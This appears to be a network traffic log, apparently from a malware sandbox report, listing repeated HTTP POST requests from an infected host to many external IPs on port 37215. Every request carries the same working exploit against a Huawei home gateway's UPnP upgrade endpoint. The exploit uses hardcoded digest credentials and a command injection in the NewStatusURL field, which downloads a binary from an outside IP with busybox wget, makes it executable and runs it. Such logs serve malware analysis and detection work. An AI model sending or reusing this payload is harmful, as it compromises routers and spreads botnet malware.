                                              Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 38 35 2e 32 34 34 2e 33 36 2e 32 30 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d [TRUNCATED]
                                              Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 185.244.36.205 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              2088192.168.2.154733631.95.57.10237215
                                              TimestampBytes transferredDirectionData
                                              Jun 9, 2024 16:33:22.104095936 CEST822OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                              Connection: keep-alive
                                              Accept: */*
                                              Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                              Content-Length: 453
                                              Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 38 35 2e 32 34 34 2e 33 36 2e 32 30 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d [TRUNCATED]
                                              Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 185.244.36.205 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              2089192.168.2.1554596138.189.7.17437215
                                              TimestampBytes transferredDirectionData
                                              Jun 9, 2024 16:33:22.104260921 CEST822OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                              Connection: keep-alive
                                              Accept: */*
                                              Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                              Content-Length: 453
                                              Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 38 35 2e 32 34 34 2e 33 36 2e 32 30 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d [TRUNCATED]
                                              Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 185.244.36.205 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              2090192.168.2.155149694.246.181.637215
                                              TimestampBytes transferredDirectionData
                                              Jun 9, 2024 16:33:22.104286909 CEST822OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                              Connection: keep-alive
                                              Accept: */*
                                              Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                              Content-Length: 453
                                              Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 38 35 2e 32 34 34 2e 33 36 2e 32 30 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d [TRUNCATED]
                                              Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 185.244.36.205 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              2091192.168.2.1541780121.22.105.1037215
                                              TimestampBytes transferredDirectionData
                                              Jun 9, 2024 16:33:22.104286909 CEST822OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                              Connection: keep-alive
                                              Accept: */*
                                              Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                              Content-Length: 453
                                              Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 38 35 2e 32 34 34 2e 33 36 2e 32 30 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d [TRUNCATED]
                                              Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 185.244.36.205 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              2092192.168.2.155974441.14.118.19837215
                                              TimestampBytes transferredDirectionData
                                              Jun 9, 2024 16:33:22.104288101 CEST822OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                              Connection: keep-alive
                                              Accept: */*
                                              Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                              Content-Length: 453
                                              Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 38 35 2e 32 34 34 2e 33 36 2e 32 30 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d [TRUNCATED]
                                              Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 185.244.36.205 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              2093192.168.2.154866431.246.1.16937215
                                              TimestampBytes transferredDirectionData
                                              Jun 9, 2024 16:33:22.104299068 CEST822OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                              Connection: keep-alive
                                              Accept: */*
                                              Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                              Content-Length: 453
                                              Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 38 35 2e 32 34 34 2e 33 36 2e 32 30 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d [TRUNCATED]
                                              Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 185.244.36.205 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              2094192.168.2.1550482197.162.6.2637215
                                              TimestampBytes transferredDirectionData
                                              Jun 9, 2024 16:33:22.104351044 CEST822OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                              Connection: keep-alive
                                              Accept: */*
                                              Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                              Content-Length: 453
                                              Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 38 35 2e 32 34 34 2e 33 36 2e 32 30 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d [TRUNCATED]
                                              Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 185.244.36.205 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              2095192.168.2.1541264122.94.29.2037215
                                              TimestampBytes transferredDirectionData
                                              Jun 9, 2024 16:33:22.104388952 CEST822OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                              Connection: keep-alive
                                              Accept: */*
                                              Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                              Content-Length: 453
                                              Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 38 35 2e 32 34 34 2e 33 36 2e 32 30 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d [TRUNCATED]
                                              Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 185.244.36.205 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              2096192.168.2.1557660186.136.111.9537215
                                              TimestampBytes transferredDirectionData
                                              Jun 9, 2024 16:33:22.104389906 CEST822OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                              Connection: keep-alive
                                              Accept: */*
                                              Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                              Content-Length: 453
                                              Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 38 35 2e 32 34 34 2e 33 36 2e 32 30 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d [TRUNCATED]
                                              Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 185.244.36.205 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              2097192.168.2.155973645.74.115.21537215
                                              TimestampBytes transferredDirectionData
                                              Jun 9, 2024 16:33:22.104398966 CEST822OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                              Connection: keep-alive
                                              Accept: */*
                                              Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                              Content-Length: 453
                                              Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 38 35 2e 32 34 34 2e 33 36 2e 32 30 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d [TRUNCATED]
